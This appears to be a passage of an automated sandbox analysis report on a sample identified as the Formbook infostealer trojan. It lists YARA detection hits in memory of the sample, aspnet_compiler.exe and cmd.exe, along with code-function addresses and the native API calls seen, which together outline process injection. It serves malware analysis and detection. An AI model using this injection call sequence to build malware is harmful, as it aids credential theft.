        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: U8RYIwIvfK.exe PID: 5840, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: aspnet_compiler.exe PID: 6120, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: cmd.exe PID: 5916, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: U8RYIwIvfK.exe PID: 5840, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: aspnet_compiler.exe PID: 6120, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: cmd.exe PID: 5916, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A928D0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A97820
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A9D048
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A90448
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A98188
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A9E1E0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A94158
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A98A20
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A9BE38
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A93278
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A9C7D0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A91F68
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A928C0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A98C20
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A90438
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A9D031
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A98C30
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A95C00
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A97810
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A9405F
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A9E1D3
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A96508
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A96518
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A98178
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A96950
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A962A8
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A91EB0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A96298
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A95EF1
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A9BE28
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A98A19
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A93268
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A91271
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A98672
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A997E0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A95BF1
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A997F0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A9C7C0
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A95F00
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A92300
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A92310
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A98710
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A96760
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A96770
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe Code function: 0_2_00A91340
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010DF900
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A2D07
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010D0D20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010F4120
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A1D55
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01102581
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A25DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010ED5E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010E841F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01191002
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010EB090
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011020A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A20A8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A2B28
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110EBB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0119DBD2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A1FF1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010F6E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A22AE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A2EF7
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001BD803
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001BE040
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001B9CF0
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001D5CEA
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001B48E6
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001D3506
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001C6550
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001C1969
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001B7190
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001D31DC
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001BFA30
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001B5226
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001B5E70
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001B8AD7
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001BCB48
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001C5FC8
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001D6FF0
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D12EF7
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D122AE
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C66E30
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D0DBD2
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D11FF1
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C7EBB0
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D12B28
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D128EC
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C5B090
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C720A0
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D120A8
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D0D466
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D01002
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C5841F
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D125DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 010DB150 appears 35 times
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001C374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119540 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011199A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011195D0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011198F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011197A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011196E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0111AD30 NtSetContextThread,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119520 NtWaitForSingleObject,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119950 NtQueueApcThread,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119560 NtWriteFile,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011199D0 NtCreateProcessEx,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011195F0 NtQueryInformationFile,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119820 NtEnumerateKey,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0111B040 NtSuspendThread,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011198A0 NtWriteVirtualMemory,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0111A710 NtOpenProcessToken,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119B00 NtSetValueKey,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119730 NtQueryVirtualMemory,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119770 NtSetInformationFile,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0111A770 NtOpenThread,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119760 NtOpenProcess,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0111A3B0 NtGetContextThread,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119FE0 NtCreateMutant,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119610 NtEnumerateValueKey,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119A10 NtQuerySection,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119650 NtQueryValueKey,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119670 NtQueryInformationProcess,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01119A80 NtOpenDirectoryObject,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011196D0 NtCreateKey,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001BB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001B84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001B58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001BB4C0 NtQueryInformationToken,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001BB4F8 NtQueryInformationToken,NtQueryInformationToken,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001D6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001DB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001D9AB4 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001B83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C896D0 NtCreateKey,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C896E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C89860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C895D0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C899A0 NtCreateSection,LdrInitializeThunk,
